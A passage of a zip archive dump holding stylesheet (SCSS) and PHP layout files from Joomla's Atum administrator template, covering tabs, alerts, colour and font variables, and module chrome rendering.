    right: 0;
    width: 20px;
    height: 20px;
    padding: 0;
    margin-top: -10px;
    margin-right: 50px;
    border-radius: 10em;
    opacity: .5;

    [dir=rtl] & {
      right: auto;
      left: 0;
      margin-right: 0;
      margin-left: 50px;
    }

    &:hover,
    &:focus {
      opacity: 1;
    }

    &:focus {
      box-shadow: 0 0 0 2px #00bcd4;
    }
  }

  &::after {
    display: none;
  }
}

.choices[data-type*="select-multiple"],
.choices[data-type*="text"] {
  .choices__input {
    padding: .35rem 0;
  }
}

.choices__heading {
  font-size: 1.2rem;
}
PK!;��C��7atum/scss/vendor/joomla-custom-elements/joomla-tab.scssnu&1i�@import "../../../../../../media/vendor/bootstrap/scss/functions";

// Atum Variables
@import "../../variables";

// Mixins
@import "../../mixin";

@import "../../../../../../media/vendor/bootstrap/scss/variables";
@import "../../../../../../media/vendor/bootstrap/scss/mixins";

// Tabs


//
// Base styles
//

joomla-tab {
  display: flex;
  flex-direction: column;

  &[orientation=horizontal]:not([view=accordion]) {
    margin-bottom: 0;
  }

  &[orientation=horizontal]:not([view=accordion]) div[role=tablist] {
    width: 100%;
    margin-bottom: 0;
  }

  > div[role=tablist] {
    display: flex;
    flex-flow: wrap;
    padding: 0;
    white-space: nowrap;
    list-style: outside none none;
    border-bottom: 1px solid var(--template-bg-dark-10);

    button[role=tab] {
      position: relative;
      box-sizing: border-box;
      display: block;
      padding: .6rem 1rem;
      color: var(--primary);
      text-decoration: none;
      background-color: var(--white);
      border: 0;
      border-top: 0;
      border-right: 0;
      border-bottom: 0;
      box-shadow: none;

      &:focus-visible {
        z-index: 1;
      }

      &[aria-expanded=true],
      &:focus,
      &:hover {
        border: 0;
        border-radius: 0;
        box-shadow: none;

        &::after {
          position: absolute;
          right: 0;
          bottom: 0;
          left: 0;
          height: 3px;
          content: "";
          background-color: var(--template-link-color);
          opacity: .8;
        }

        .text-muted {
          color: var(--template-text-light) !important;
        }
      }

      &[aria-expanded=true] {
        font-weight: $font-weight-bold;
        background: var(--template-bg-dark-3);
      }

      .text-muted {
        color: var(--template-text-dark) !important;
      }
    }
  }

  > button[role=region] {
    width: 100%;
    padding: .7rem;
    color: var(--template-text-light);
    text-align: start;
    background-color: var(--template-link-color);
    border: 1px solid var(--template-text-light);
    border-top: 0;

    &[aria-expanded=true],
    &:hover,
    &:focus {
      color: var(--template-text-light);
      background-color: var(--template-bg-dark);
    }

    .text-muted {
      color: var(--template-text-light) !important;
    }
  }

  > joomla-tab-element {
    --gutter-x: 2rem;
    display: none;
    padding: 30px 2vw;
    background-color: $white;
    border: 0;
    border-radius: .25rem;
    box-shadow: none;

    &[active] {
      display: block;
    }
  }

  &[orientation=vertical] {
    flex-direction: row;
    align-items: flex-start;
    width: 100%;

    > div[role=tablist] {
      flex: 0 0 25%;
      flex-direction: column;
      width: 100%;
      min-width: 25%;
      max-width: 25%;
      height: auto;
      padding: 0;
      overflow: hidden;
      border: 1px solid $gray-300;
      border-radius: 0;
      box-shadow: none;

      @include media-breakpoint-down(lg) {
        flex: 0 0 100%;
        max-width: 100%;
      }

      button[role=tab] {
        text-align: start;
        &[aria-expanded=true] {
          color: var(--template-text-light);
          background-color: var(--template-bg-dark-60);
        }
      }
    }

    button[role=tab]:last-of-type {
      border-bottom: 0;
    }

    button[role=tab] {
      position: relative;
      display: block;
      padding: .75em 1em;
      margin: -1px 0;
      color: var(--template-special-color);
      text-decoration: none;
      border-top: 1px solid transparent;
      border-bottom: 1px solid $gray-300;
      box-shadow: none;

      &[aria-expanded=true],
      &:focus,
      &:hover {
        color: var(--template-text-light);
        background-color: var(--template-bg-dark-60);
        background-image: none;
        border-right: 0;
        box-shadow: none;

        &::after {
          top: 0;
          bottom: 0;
          left: -1px;
          width: 5px;
          height: auto;
          background-color: var(--template-bg-dark);
        }

        .text-muted {
          color: var(--template-text-light) !important;
        }
      }
      .text-muted {
        color: var(--template-text-dark) !important;
      }
    }

    > joomla-tab-element {
      width: 100%;
      padding: $grid-gutter-width-s 0 $grid-gutter-width-s $grid-gutter-width-s;
      border: 0 none;
      box-shadow: none;
    }
  }

  &[view=accordion] {
    flex-direction: column;
    white-space: normal;
    border-radius: 0;
    box-shadow: 0 1px $white inset, 0 0 3px rgba(0, 0, 0, .04);

    joomla-tab-element {
      display: none;
      padding: 15px;

      &[active] {
        display: block;
        width: 100%;
        max-width: 100%;
        border-bottom: 1px solid $gray-300;
      }
    }

    [active],
    [aria-expanded=true] {
      background-color: $white;
    }

    .col-md-6,
    .col-md-9,
    .col-md-3 {
      padding: .5rem 0 0 !important;
    }

    joomla-tab[view=accordion] {
      > div[role=tablist] {
        background-color: $white;
      }

      button[role=tab] {
        position: relative;
        display: block;
        padding: .75em 1em;
        color: var(--template-text-light);
        text-align: start;
        text-decoration: none;
        border: 0;
        border-bottom: 1px solid $gray-300;
        box-shadow: none;

        &[aria-expanded=true]::after,
        &:hover::after {
          position: absolute;
          top: auto;
          right: -1px;
          bottom: -1px;
          left: -1px;
          display: block;
          width: calc(100% + 2px);
          height: 5px;
          content: "";
          background-color: var(--template-bg-dark);
          opacity: .8;
        }
      }
    }

    #permissions-sliders > joomla-tab-element[active] {
      padding: 0 !important;

      @include media-breakpoint-down(lg) {
        [dir=ltr] & .respTable {
          text-align: right;
        }

        [dir=rtl] & .respTable {
          text-align: left;
        }

        .respTable, .respTable thead, .respTable tbody, .respTable tr, .respTable th, .respTable td {
          display: block;
        }

        .respTable thead {
          position: absolute;
          top: -1111px;
          left: -1111px;
        }

        /* stylelint-disable */
        .respTable td::before {
          font-weight: $bold-weight;
          content: attr(data-label) ":";

          [dir=ltr] & {
            float: left;
            padding: 0 2em 0 0;
          }

          [dir=rtl] & {
            float: right;
            padding: 0 0 0 2em;
          }
        }
        /* stylelint-enable */

        .respTable td:nth-child(1) {
          font-weight: $bold-weight;
        }

        .respTable td:last-child {
          border-bottom: 1em var(--template-bg-dark-80) solid;
        }

        .oddCol {
          background: var(--template-bg-light);
        }
      }
    }
  }
  .main-card-columns > * > & {
    height: 100%;
    border-left: 1px solid var(--template-bg-dark-10);
  }
}
PK!�� ��9atum/scss/vendor/joomla-custom-elements/joomla-alert.scssnu&1i�@import "../../variables";
@import "../../../../../../node_modules/joomla-ui-custom-elements/dist/css/joomla-alert";

// The following is a restyle for the system alerts

#system-message-container joomla-alert {
  position: relative;
  display: flex;
  width: 100%;
  min-width: 16rem;
  padding: 0;
  margin-bottom: 1rem;
  color: var(--alert-accent-color, var(--template-bg-dark));
  background-color: var(--alert-bg-color, var(--white));
  border: 1px solid var(--alert-accent-color, var(--template-bg-dark));
  border-radius: .25rem;
  transition: opacity .15s linear;

  .alert-heading {
    display: flex;
    flex-direction: column;
    justify-content: center;
    padding: .8rem;
    color: var(--white);
    background: var(--alert-accent-color, var(--template-bg-dark));
    align-content: center;

    .message::before,
    .success::before {
      display: inline-block;
      width: 1em;
      height: 1em;
      content: "";
      background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1299 813l-422 422q-19 19-45 19t-45-19l-294-294q-19-19-19-45t19-45l102-102q19-19 45-19t45 19l147 147 275-275q19-19 45-19t45 19l102 102q19 19 19 45t-19 45zm141 83q0-148-73-273t-198-198-273-73-273 73-198 198-73 273 73 273 198 198 273 73 273-73 198-198 73-273zm224 0q0 209-103 385.5t-279.5 279.5-385.5 103-385.5-103-279.5-279.5-103-385.5 103-385.5 279.5-279.5 385.5-103 385.5 103 279.5 279.5 103 385.5z"/></svg>');
      background-size: 100%;
    }

    .notice::before,
    .info::before {
      display: inline-block;
      width: 1em;
      height: 1em;
      content: "";
      background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 110c23.196 0 42 18.804 42 42s-18.804 42-42 42-42-18.804-42-42 18.804-42 42-42zm56 254c0 6.627-5.373 12-12 12h-88c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h12v-64h-12c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h64c6.627 0 12 5.373 12 12v100h12c6.627 0 12 5.373 12 12v24z"/></svg>');
      background-size: 100%;
    }

    .warning::before {
      display: inline-block;
      width: 1em;
      height: 1em;
      content: "";
      background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 1792 1792" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M1024 1375v-190q0-14-9.5-23.5t-22.5-9.5h-192q-13 0-22.5 9.5t-9.5 23.5v190q0 14 9.5 23.5t22.5 9.5h192q13 0 22.5-9.5t9.5-23.5zm-2-374l18-459q0-12-10-19-13-11-24-11h-220q-11 0-24 11-10 7-10 21l17 457q0 10 10 16.5t24 6.5h185q14 0 23.5-6.5t10.5-16.5zm-14-934l768 1408q35 63-2 126-17 29-46.5 46t-63.5 17h-1536q-34 0-63.5-17t-46.5-46q-37-63-2-126l768-1408q17-31 47-49t65-18 65 18 47 49z"/></svg>');
      background-size: 100%;
    }

    .error::before,
    .danger::before {
      display: inline-block;
      width: 1em;
      height: 1em;
      content: "";
      background-image: url('data:image/svg+xml;utf8,<svg width="1792" height="1792" viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path fill="rgba(255, 255, 255, .95)" d="M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm101.8-262.2L295.6 256l62.2 62.2c4.7 4.7 4.7 12.3 0 17l-22.6 22.6c-4.7 4.7-12.3 4.7-17 0L256 295.6l-62.2 62.2c-4.7 4.7-12.3 4.7-17 0l-22.6-22.6c-4.7-4.7-4.7-12.3 0-17l62.2-62.2-62.2-62.2c-4.7-4.7-4.7-12.3 0-17l22.6-22.6c4.7-4.7 12.3-4.7 17 0l62.2 62.2 62.2-62.2c4.7-4.7 12.3-4.7 17 0l22.6 22.6c4.7 4.7 4.7 12.3 0 17z"/></svg>');
      background-size: 100%;
    }
  }

  .alert-wrapper {
    width: 100%;
  }

  .alert-link {
    color: var(--template-link-color);
    text-decoration: underline;
  }

  &[type="success"],
  &[type="message"] {
    --alert-accent-color: #{$state-success-text};
    --alert-bg-color: #{$state-success-bg};
  }

  &[type="info"],
  &[type="notice"] {
    --alert-accent-color: #{$state-info-text};
    --alert-bg-color: #{$state-info-bg};
  }

  &[type="warning"] {
    .joomla-alert--close {
      color: #{$state-warning-text};
    }

    color: #{$state-warning-text};
    --alert-accent-color: #{$warning};
    --alert-bg-color: #{$state-warning-bg};
  }

  &[type="error"],
  &[type="danger"] {
    --alert-accent-color: #{$state-danger-text};
    --alert-bg-color: #{$state-danger-bg};
  }

  .joomla-alert--close,
  .joomla-alert-button--close {
    position: absolute;
    top: 0;
    right: 0;
    padding: .75rem .8rem;
    font-size: 2rem;
    line-height: 1rem;
    color: var(--alert-accent-color);
    background: none;
    border: 0;
    opacity: 1;

    &:hover,
    &:focus {
      text-decoration: none;
      cursor: pointer;
      opacity: .75;
    }

    [dir=rtl] & {
      right: auto;
      left: 0;
    }
  }

  div {
    font-size: 1rem;
    .alert-message {
      padding: .15rem .3rem;
      padding-inline-end: 2rem;
      margin: .5rem;
    }

    .alert-message:not(:first-of-type) {
      border-top: 1px solid var(--alert-accent-color);
    }
  }
}
PK!�@�uu-atum/scss/vendor/awesomplete/awesomplete.scssnu&1i�// Awesomplete
@import "../../../../../../node_modules/awesomplete/awesomplete";

.awesomplete {
  display: block;
}
PK!]�<c77!atum/scss/vendor/_codemirror.scssnu&1i�// Codemirror

.CodeMirror-fullscreen {
  top: 63px;
}
PK!%7��&&atum/scss/vendor/_dragula.scssnu&1i�// Dragula

.gu-mirror {
  position: fixed !important;
  z-index: $zindex-popover !important;
  display: table;
  margin: 0 !important;
  cursor: move;
  background-color: $teal;
  opacity: .8;

  td, th {
    background-color: $teal;
  }
}

.js-draggable .sortable-handler {
  cursor: move;
}
PK!�t\J�2�2atum/scss/_variables.scssnu&1i�// Variables

$white:                            #fff;
$whiteoffset:                      #fefefe;
$gray-100:                         #f8f9fa;
$gray-200:                         #e8e8e8;
$gray-300:                         #dee2e6; //used for toolbar and badges
$gray-400:                         #cdcdcd; //used for border-bottom sidebar-nav and toolbar normal border
$gray-500:                         #adb5bd; //used in toolbar and buttons for border
$gray-600:                         #666e76; //used for atum-text-dark and $secondary
$gray-700:                         #495057; //used for atum-text-dark, secondary
$gray-800:                         #343a40;
$gray-900:                         #212529; //used for tree header
$bluegray:                         #b2bfcd; // used for borders
$black:                            #000;    //used for shadows
$focuscolor:                       #39f;    //used for focus color
$dark-blue:                        #001b4c; //is the atum-special-color
$light-blue:                       #2a69b8; //is the atum-link-color
$focusshadow:                      0 0 0 .2rem #eaeaea;

// BS Colours
$blue:                             hsl(213, 63%, 44%); // base color for calculation, Primary-color
$indigo:                           #0377be; //used in bootstrap
$purple:                           #6f42c1; //used in bootstrap
$pink:                             #971250; //used in bootstrap
$red:                              #c52827; //used in bootstrap
$red-dark:                         #3b0d0c; //used for alerts error
$yellow:                           #ffb514; //used in bootstrap
$green:                            #457d54; //used in bootstrap
$green-dark:                       #0f2f21; //used for alert success
$teal:                             #20c997; //used in bootstrap
$cyan:                             #107d8e; //used in bootstrap
$darkblue:                         #132f53;
$base-color:                       $darkblue;

// Atum colours defined as scss variables for use in scss functions
$atum-text-dark:                   $gray-700;
$success:                          $green;
$danger:                           $red;
$info:                             $light-blue;
$warning:                          $yellow;

$theme-colors: ();
$theme-colors: map-merge((
  primary:                         $base-color, //used only in bootstrap, please use $atum-bg-dark
  secondary:                       $gray-700, //used for btn-secondary
  success:                         $success,
  info:                            $light-blue,
  warning:                         $yellow,
  danger:                          $danger,
  light:                           $gray-100, //used in bootstrap
  dark:                            $gray-900,  //used in bootstrap and for table-border
  atum-link-color:                 $light-blue,
  atum-text-dark:                  $atum-text-dark,
  action:                          $base-color,
  error:                           $red-dark,
  alert-success:                   $green-dark
), $theme-colors);

$colors: (
  card-bg:                         rgba(255, 255, 255, .7),
  bluegray:                        $bluegray,
  lightbluegray:                   #f6f9fc,
  toolbar-bg:                      $white,
  success-border:                  var(--success),
  info-border:                     var(--info),
  warning-border:                  var(--warning),
  danger-border:                   var(--danger),
  login-main-bg:                   darken($base-color, 8%), //used on login
  border:                          $gray-400,
  "white":                         $white, // the key here must be in quotes to avoid scss compilation warnings.
  white-offset:                    $whiteoffset,
  focus:                           $focuscolor,
  focus-shadow:                    $focusshadow,
  toggle-color:                    $white, //used in sidebar
  template-sidebar-bg:                 var(--template-bg-dark-80),
  template-sidebar-font-color:         $white,
  template-sidebar-link-color:         $white,
  template-bg-light:                   #f0f4fb, //light background color, frontend dashboard background
  template-text-light:                 $white,
  template-special-color:              $dark-blue,
  template-link-color:                 $light-blue,
  template-link-hover-color:           darken($light-blue, 20%),
  template-contrast:                   $light-blue,
  template-bg-dark:                    hsl(var(--hue), 40%, 20%),
  template-bg-dark-3:                  hsl(var(--hue), 40%, 97%),
  template-bg-dark-5:                  hsl(var(--hue), 40%, 95%),
  template-bg-dark-7:                  hsl(var(--hue), 40%, 93%),
  template-bg-dark-10:                 hsl(var(--hue), 40%, 90%),
  template-bg-dark-15:                 hsl(var(--hue), 40%, 85%),
  template-bg-dark-20:                 hsl(var(--hue), 40%, 80%),
  template-bg-dark-30:                 hsl(var(--hue), 40%, 70%),
  template-bg-dark-40:                 hsl(var(--hue), 40%, 60%),
  template-bg-dark-50:                 hsl(var(--hue), 40%, 50%),
  template-bg-dark-60:                 hsl(var(--hue), 40%, 40%),
  template-bg-dark-65:                 hsl(var(--hue), 40%, 35%),
  template-bg-dark-70:                 hsl(var(--hue), 40%, 30%),
  template-bg-dark-75:                 hsl(var(--hue), 40%, 25%),
  template-bg-dark-80:                 hsl(var(--hue), 40%, 20%),
  template-bg-dark-90:                 hsl(var(--hue), 40%, 10%)
);

// Alerts
$alert-border-level:               0;
$alert-color-level:                0;

// Global
$atum-box-shadow:                  0 2px 10px -8px var(--template-bg-dark-50);
$enable-rounded:                   true;
$input-box-shadow:                 inset 0 0 0 .1rem #e9e9e9;
$input-btn-padding-y:              .5rem;
$input-btn-padding-x:              1rem;
$input-max-width:                  100%;
$btn-disabled-opacity:             .4;

// Remove prefix added in BS5 for compat with Joomla beta's shipped with Betas
$variable-prefix:                  "";

// Toolbar
$atum-toolbar-line-height:         2.45rem;

// Sidebar
$sidebar-width:                    18rem;
$sidebar-width-login:              28.75rem;
$sidebar-width-closed:             3rem;
$main-brand-height:                3rem;

// Fonts
$font-family-sans-serif:           "Roboto", -apple-system, BlinkMacSystemFont, "Segoe UI", "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji" !default;
$h1-font-size:                     1.65rem;
$h2-font-size:                     1.5rem;
$h3-font-size:                     1.25rem;
$h4-font-size:                     1rem;
$h5-font-size:                     .9286rem;
$h6-font-size:                     .8571rem;
$headings-color:                   var(--template-bg-dark);
$font-size-sm:                     .8rem;
$font-size-vsm:                    .6rem;
$display1-size:                    1rem;
$display2-size:                    .875rem;
$content-font-size:                .875rem;
$label-font-size:                  1rem;
$danger-bg:                        #900;
$badge-font-size:                  .75rem;
$jicon-css-prefix:                 icon !default;
$fa-css-prefix:                    fa !default;
$fa-font-path:                     "../../../../media/vendor/fontawesome-free/webfonts";
$roboto-font-path:                 "../../../../media/vendor/roboto-fontface/fonts";

// Font weights
$thin-weight:                      100;
$extralight-weight:                200;
$light-weight:                     300;
$normal-weight:                    400;
$medium-weight:                    500;
$semibold-weight:                  600;
$bold-weight:                      700;
$extrabold-weight:                 800;
$black-weight:                     900;

// Text
$body-color:                       var(--template-text-dark); //only used in bootstrap, please use --template-color-dark

// Tables
$table-bg:                         var(--white);
$table-cell-padding-y:             .75rem;
$table-cell-padding-x:             1rem;
$table-cell-padding-y-sm:          .3rem;
$table-cell-padding-x-sm:          .3rem;
$table-group-separator-color:      $gray-300;

// Dropdowns
$dropdown-padding-y:               0;
$dropdown-box-shadow:              0 1px 1px rgba($black, .15);
$dropdown-link-hover-color:        var(--template-text-dark);
$dropdown-border-width:            1px;
$dropdown-item-padding-y:          .5rem;
$dropdown-item-padding-x:          .75rem;
$dropdown-spacer:                  0;

// Cards
$card-border-width:                0;
$card-border-color:                transparent;

// Alerts
$state-success-text:               $success;
$state-success-bg:                 lighten($success, 58%);
$state-success-border:             hsl(var(--hue),50%,93%);

$state-info-text:                  var(--template-bg-dark-70);
$state-info-bg:                    var(--white);
$state-info-border:                var(--template-bg-dark-70);

$state-warning-text:               darken($warning, 24%);
$state-warning-bg:                 lighten($warning, 44%);
$state-warning-border:             $warning;

$state-danger-text:                $danger;
$state-danger-bg:                  lighten($danger, 52%);
$state-danger-border:              $danger;

$state-error-text:                 $danger;
$state-error-bg:                   lighten($danger, 52%);
$state-error-border:               $danger;

// Badges
$badge-padding-x:                  .2rem;
$badge-padding-y:                  .3rem;
$badge-border-radius:              .2rem;

$success-bg:                       $green;
$success-txt:                      $white;

$warning-bg:                       #f9d71c;
$warning-txt:                      #000;

$danger-bg:                        #900;
$danger-txt:                       #fff;

$info-bg:                          $gray-300;
$info-txt:                         $white;

// Input Group
$input-group-addon-color:          var(--white);
$input-group-addon-bg:             $base-color;
$input-group-addon-border-color:   var(--template-bg-dark);

// Treeselect
$treeselect-line-height:           2.2rem;
$treeselect-indent:                40px;

// List
$list-group-bg:                    var(--white-offset);
$list-group-border-color:          hsl(var(--hue),40%,85%);
$list-group-item-padding-y:        .75rem;

// Buttons
$input-btn-padding-y-sm-submenu:    0;
$input-btn-padding-x-sm-submenu:    1.625rem;
$input-btn-submenu-icon-distance:   1rem;

// Custom form
$form-select-indicator-padding:    3rem;
$form-select-bg:                   var(--template-bg-light);
$form-select-bg-size:              116rem;
$form-select-indicator:            url("../images/select-bg.svg");
$form-select-indicator-rtl:        url("../images/select-bg-rtl.svg");
$form-select-indicator-active:     url("../../../images/select-bg.svg");
$form-select-indicator-active-rtl: url("../../../images/select-bg-rtl.svg");
$form-select-background:           $form-select-indicator no-repeat right center / $form-select-bg-size; // Used so we can have multiple background elements (e.g., arrow and feedback icon)
$form-select-background-rtl:       $form-select-indicator-rtl no-repeat left center / $form-select-bg-size; // Used so we can have multiple background elements (e.g., arrow and feedback icon)
$form-select-box-shadow:           $atum-box-shadow;
$form-select-bg-size-sm:           75rem;
$form-select-multiple-padding-y:   .3rem;
$form-file-button-color:           var(--white);

//input
$input-padding:                    .5rem 1rem;
$input-border:                     solid 1px var(--template-bg-dark-20);

// Modals
$modal-header-height:              2.875rem;

// Quickicons
$quickicon-bg:                     var(--white);
$quickicon-box-shadow-success:     0 0 3px 0 var(--success);
$quickicon-box-shadow-danger:      0 0 3px 0 var(--danger);
$quickicon-box-shadow-warning:     0 0 3px 0 var(--warning);
$quickicon-icon-size:              2rem;
$quickicon-icon-size-sm:           1.3rem;

// Gutter
$grid-gutter-width:                2rem;
$grid-gutter-width-s:              15px;

// Breadcrumbs
$breadcrumb-bg:                    var(--white);

// Links
$link-color:                       var(--template-link-color);
$link-hover-color:                 var(--template-link-hover-color);
$link-decoration:                  none;

// Z-Index list
$zindex-negative:                  -1;
$zindex-actions:                   auto;
$zindex-toolbar:                   1000;
$zindex-sidebar:                   1010;
$zindex-header:                    1020;
$zindex-alerts:                    1030;
$zindex-modal-backdrop:            1040;
$zindex-modal:                     1050;
$zindex-popover:                   1060;
$zindex-tooltip:                   1070;
$zindex-mobile-bottom:             8000;
$zindex-mobile-toggle:             9999;
$zindex-mobile-menu:               9000;
PK!n�u::atum/html/layouts/status.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 *
 * Module chrome for rendering the module in a submenu
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\Helper\ModuleHelper;
use Joomla\CMS\Language\Text;

$modulePosition = $displayData['modules'];

$renderer   = Factory::getDocument()->loadRenderer('module');
$modules    = ModuleHelper::getModules($modulePosition);
$moduleHtml = [];
$moduleCollapsedHtml = [];

foreach ($modules as $key => $mod)
{
	$out = $renderer->render($mod);

	if ($out !== '')
	{
		if (strpos($out, 'data-bs-toggle="modal"') !== false)
		{
			$dom = new \DOMDocument;
			$dom->loadHTML($out);
			$els = $dom->getElementsByTagName('a');

			$moduleCollapsedHtml[] = $dom->saveHTML($els[0]); //$els[0]->nodeValue;
		}
		else
		{
			$moduleCollapsedHtml[] = $out;
		}

		$moduleHtml[] = $out;
	}
}
?>
<div class="header-items d-flex ms-auto">
	<?php
		foreach ($moduleHtml as $mod)
		{
			echo '<div class="header-item">' . $mod . '</div>';
		}
	?>
	<div class="header-more d-none" id="header-more-items" >
		<button class="header-more-btn dropdown-toggle" type="button" title="<?php echo Text::_('TPL_ATUM_MORE_ELEMENTS'); ?>" data-bs-toggle="dropdown" aria-expanded="false">
			<div class="header-item-icon"><span class="icon-ellipsis-h" aria-hidden="true"></span></div>
			<div class="visually-hidden"><?php echo Text::_('TPL_ATUM_MORE_ELEMENTS'); ?></div>
		</button>
		<div class="header-dd-items dropdown-menu">
			<?php
			foreach ($moduleCollapsedHtml as $key => $mod)
			{
				echo '<div class="header-dd-item dropdown-item" data-item="' . $key . '">' . $mod . '</div>';
			}
			?>
		</div>
	</div>
</div>
PK!u�_		#atum/html/layouts/chromes/title.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 *
 * Module chrome for rendering the module in a submenu
 */

defined('_JEXEC') or die;

$module = $displayData['module'];

if ((string) $module->content === '')
{
	return;
}

?>
<div class="card-header">
	<h6><?php echo $module->title; ?></h6>
</div>
<?php echo $module->content; ?>
PK!]h5�
�
"atum/html/layouts/chromes/well.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;

$module  = $displayData['module'];
$params  = $displayData['params'];
$attribs = $displayData['attribs'];

if ((string) $module->content === '')
{
	return;
}

$id = $module->id;

// Permission checks
$user      = Factory::getUser();
$canEdit   = $user->authorise('core.edit', 'com_modules.module.' . $id) && $user->authorise('core.manage', 'com_modules');
$canChange = $user->authorise('core.edit.state', 'com_modules.module.' . $id) && $user->authorise('core.manage', 'com_modules');

$moduleTag      = $params->get('module_tag', 'div');
$bootstrapSize  = (int) $params->get('bootstrap_size', 12);
$moduleClass    = $bootstrapSize ? 'col-md-' . $bootstrapSize : 'col-md-12';
$headerTag      = htmlspecialchars($params->get('header_tag', 'h2'), ENT_QUOTES, 'UTF-8');
$moduleClassSfx = $params->get('moduleclass_sfx', '');

// Temporarily store header class in variable
$headerClass = $params->get('header_class') ? ' class="' . htmlspecialchars($params->get('header_class'), ENT_QUOTES, 'UTF-8') . '"' : '';

// Get the module icon
$headerIcon = $params->get('header_icon') ? '<span class="' . htmlspecialchars($params->get('header_icon'), ENT_QUOTES, 'UTF-8') . '" aria-hidden="true"></span>' : '';

?>
<div class="<?php echo $moduleClass; ?> module-wrapper">
	<<?php echo $moduleTag; ?> class="card mb-3 <?php echo $moduleClassSfx; ?>">
		<?php if ($canEdit || $canChange || $headerIcon || $module->showtitle) : ?>
			<div class="card-header">
				<?php if ($canEdit || $canChange) : ?>
					<?php $dropdownPosition = Factory::getLanguage()->isRtl() ? 'start' : 'end'; ?>
					<div class="module-actions dropdown">
						<button type="button" data-bs-toggle="dropdown" data-bs-display="static" aria-haspopup="true" aria-expanded="false" class="btn" id="dropdownMenuButton-<?php echo $id; ?>">
							<span class="icon-cogs" aria-hidden="true"></span>
							<span class="visually-hidden"><?php echo Text::sprintf('JACTION_EDIT_MODULE', $module->title); ?></span>
						</button>
						<div class="dropdown-menu dropdown-menu-<?php echo $dropdownPosition; ?>" aria-labelledby="dropdownMenuButton-<?php echo $id; ?>">
							<?php if ($canEdit) : ?>
								<?php $uri = Uri::getInstance(); ?>
								<?php $url = Route::_('index.php?option=com_modules&task=module.edit&id=' . $id . '&return=' . base64_encode($uri)); ?>
								<a class="dropdown-item" href="<?php echo $url; ?>"><?php echo Text::_('JACTION_EDIT'); ?></a>
							<?php endif; ?>
							<?php if ($canChange) : ?>
								<button type="button" class="dropdown-item unpublish-module" data-module-id="<?php echo $id; ?>"><?php echo Text::_('JACTION_UNPUBLISH'); ?></button>
							<?php endif; ?>
						</div>
					</div>
				<?php endif; ?>

				<?php if ($module->showtitle) : ?>
					<<?php echo $headerTag; ?><?php echo $headerClass; ?>>
						<?php echo $headerIcon; ?>
						<?php echo htmlspecialchars($module->title, ENT_QUOTES, 'UTF-8'); ?>
					</<?php echo $headerTag; ?>>
				<?php endif; ?>
			</div>
		<?php endif; ?>
		<div class="card-body">
			<?php echo $module->content; ?>
		</div>
	</<?php echo $moduleTag; ?>>
</div>
PK!A��)atum/html/layouts/chromes/header-item.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 *
 * Module chrome for rendering the module in a submenu
 */

defined('_JEXEC') or die;

$module = $displayData['module'];

if ((string) $module->content === '')
{
	return;
}

?>
<div class="header-item d-flex">
	<?php echo $module->content; ?>
</div>
PK!`� ��"atum/html/layouts/chromes/body.phpnu&1i�<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  Templates.Atum
 *
 * @copyright   (C) 2019 Open Source Matters, Inc. <https://www.joomla.org>
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

use Joomla\CMS\Factory;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;

$module = $displayData['module'];
$params = $displayData['params'];

if ((string) $module->content === '')
{
	return;
}

$id = $module->id;

// Permission checks
$user      = Factory::getUser();
$canEdit   = $user->authorise('core.edit', 'com_modules.module.' . $id) && $user->authorise('core.manage', 'com_modules');
$canChange = $user->authorise('core.edit.state', 'com_modules.module.' . $id) && $user->authorise('core.manage', 'com_modules');

$moduleTag      = $params->get('module_tag', 'div');
$bootstrapSize  = (int) $params->get('bootstrap_size', 6);
$moduleClass    = $bootstrapSize ? 'col-md-' . $bootstrapSize : 'col-md-12';
$headerTag      = htmlspecialchars($params->get('header_tag', 'h2'), ENT_QUOTES, 'UTF-8');
$moduleClassSfx = $params->get('moduleclass_sfx', '');

// Temporarily store header class in variable
$headerClass = $params->get('header_class');
$headerClass = $headerClass ? ' ' . htmlspecialchars($headerClass, ENT_QUOTES, 'UTF-8') : '';

?>
<div class="<?php echo $moduleClass; ?> module-wrapper">
	<<?php echo $moduleTag; ?> class="card pt-3<?php echo $moduleClassSfx; ?>">
		<?php if ($canEdit || $canChange) : ?>
